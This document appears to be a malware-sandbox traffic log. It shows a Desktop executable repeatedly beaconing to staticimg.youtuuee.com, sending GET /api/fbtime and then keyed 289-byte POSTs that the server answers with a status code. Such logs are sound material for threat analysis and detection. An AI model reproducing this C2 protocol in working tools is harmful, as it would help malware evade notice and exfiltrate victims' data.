Oct 24, 2021 09:46:44.549891949 CEST
1407 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:44.695611954 CEST
1407 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 30 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 59 42 65 45 33 49 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150707,"time":1635061604,"rand_str":"YBeE3I"}0

Oct 24, 2021 09:46:44.707463980 CEST
1407 OUT POST /api/?sid=2150707&key=ddacdc5d5fb6e792522698a758a1431a HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:44.859213114 CEST
1408 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

26 192.168.2.5 49780 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:45.172622919 CEST
1409 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:45.318222046 CEST
1409 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 33 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 78 6b 67 64 69 70 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150735,"time":1635061605,"rand_str":"xkgdip"}0

Oct 24, 2021 09:46:45.329612017 CEST
1410 OUT POST /api/?sid=2150735&key=141effec60248e2d310c38549aec1135 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:45.483130932 CEST
1410 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

27 192.168.2.5 49781 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp kBytes transferred Direction Data

Oct 24, 2021 09:46:45.814385891 CEST
1411 OUT GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:45.966428995 CEST
1412 IN HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Oct 2021 07:46:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 36 79 32 74 5a 65 22 7d 0d 0a 30 0d 0a 0d 0a
Data Ascii: 35{"sid":2150763,"time":1635061605,"rand_str":"6y2tZe"}0

Oct 24, 2021 09:46:45.979497910 CEST
1412 OUT POST /api/?sid=2150763&key=48ddd1efffb3f391c22b544a783191cf HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:46.131217003 CEST  1413  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:46 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

28 192.168.2.5 49782 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:46.451883078 CEST  1414  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:46.599595070 CEST  1414  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:46 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 39 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 42 58 65 64 37 72 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2150799,"time":1635061606,"rand_str":"BXed7r"}0

Oct 24, 2021 09:46:46.608633041 CEST  1414  OUT
  POST /api/?sid=2150799&key=5bcf6127fb480887256a415fe5d0b555 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:46.761059046 CEST  1415  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:46 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

29 192.168.2.5 49783 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:47.079695940 CEST  1416  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:47.225680113 CEST  1416  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:47 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 38 33 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4b 70 68 55 71 4d 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2150837,"time":1635061607,"rand_str":"KphUqM"}0

Oct 24, 2021 09:46:47.235615015 CEST  1417  OUT
  POST /api/?sid=2150837&key=d83b5cee705da3d2c3bd196ed9680364 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:47.394483089 CEST  1417  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:47 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

3 192.168.2.5 49751 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:15.055269003 CEST  1325  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:15.203010082 CEST  1325  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:15 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 33 31 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4d 4a 77 39 36 5a 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2149311,"time":1635061575,"rand_str":"MJw96Z"}0

Oct 24, 2021 09:46:15.348901987 CEST  1325  OUT
  POST /api/?sid=2149311&key=51597f4ebba3856d49b8f376ed79ffcd HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:15.500364065 CEST  1326  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:15 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

30 192.168.2.5 49784 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:47.728708982 CEST  1418  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:47.883045912 CEST  1419  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:47 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 38 36 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 37 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 46 68 61 6e 45 43 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2150867,"time":1635061607,"rand_str":"FhanEC"}0

Oct 24, 2021 09:46:47.894747019 CEST  1419  OUT
  POST /api/?sid=2150867&key=063d31afe0e24621c7d74dbaf75408d0 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:48.056725025 CEST  1420  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:47 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

31 192.168.2.5 49785 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:48.383100033 CEST  1420  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:48.527046919 CEST  1421  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:48 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 30 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 6b 55 76 64 65 78 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2150907,"time":1635061608,"rand_str":"kUvdex"}0

Oct 24, 2021 09:46:48.538640976 CEST  1421  OUT
  POST /api/?sid=2150907&key=021ad353d9168c6646a91ee81aef17bd HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:48.688570976 CEST  1422  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:48 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

32 192.168.2.5 49786 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:49.005182028 CEST  1423  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:49.163343906 CEST  1423  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:49 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 33 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 45 4a 48 53 54 54 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2150939,"time":1635061609,"rand_str":"EJHSTT"}0

Oct 24, 2021 09:46:49.172435045 CEST  1424  OUT
  POST /api/?sid=2150939&key=ed9790a22aadd1de955b18ce8e9931a9 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:49.329922915 CEST  1424  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:49 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

33 192.168.2.5 49787 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:49.640058994 CEST  1425  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:49.786853075 CEST  1425  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:49 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 39 37 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 7a 36 46 33 32 38 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2150977,"time":1635061609,"rand_str":"z6F328"}0

Oct 24, 2021 09:46:49.794687033 CEST  1426  OUT
  POST /api/?sid=2150977&key=4ee7a2d959cb4a10f673c7d88974a245 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:49.950081110 CEST  1426  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:49 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

34 192.168.2.5 49788 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:50.273909092 CEST  1427  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:50.421237946 CEST  1428  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:50 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 31 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 4a 55 78 34 46 37 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151013,"time":1635061610,"rand_str":"JUx4F7"}0

Oct 24, 2021 09:46:50.438482046 CEST  1428  OUT
  POST /api/?sid=2151013&key=46e6a5a1a8c4f08d053bfa44a82eaf14 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:50.593585968 CEST  1429  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:50 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

35 192.168.2.5 49789 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:50.905320883 CEST  1430  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:51.051181078 CEST  1430  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:50 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 35 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 6a 54 5a 36 67 79 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151055,"time":1635061610,"rand_str":"jTZ6gy"}0

Oct 24, 2021 09:46:51.059366941 CEST  1430  OUT
  POST /api/?sid=2151055&key=7cebe7828b58fe3eef762f25303a291a HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:51.219743013 CEST  1431  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:51 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

36 192.168.2.5 49790 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:51.530956984 CEST  1432  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:51.677324057 CEST  1432  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:51 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 30 39 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 31 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 6e 4a 32 4d 66 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151095,"time":1635061611,"rand_str":"unJ2Mf"}0

Oct 24, 2021 09:46:51.685113907 CEST  1433  OUT
  POST /api/?sid=2151095&key=7c9887cd3cb16aeb568a33c9ccd8c538 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com


Oct 24, 2021 09:46:51.835508108 CEST  1433  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:51 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: c{"status":3}0


Session ID Source IP Source Port Destination IP Destination Port Process

37 192.168.2.5 49791 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

Timestamp  kBytes transferred  Direction  Data

Oct 24, 2021 09:46:52.154023886 CEST  1434  OUT
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:52.302098036 CEST  1435  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Sun, 24 Oct 2021 07:46:52 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.4.21
  Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 31 31 33 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 31 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 72 33 7a 62 39 79 22 7d 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 35{"sid":2151139,"time":1635061612,"rand_str":"r3zb9y"}0

Oct 24, 2021 09:46:52.310817957 CEST  1435  OUT
  POST /api/?sid=2151139&key=e095cad2278f925f7e4a191097cfde84 HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 289
  Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:52.470722914 CEST  1436  IN
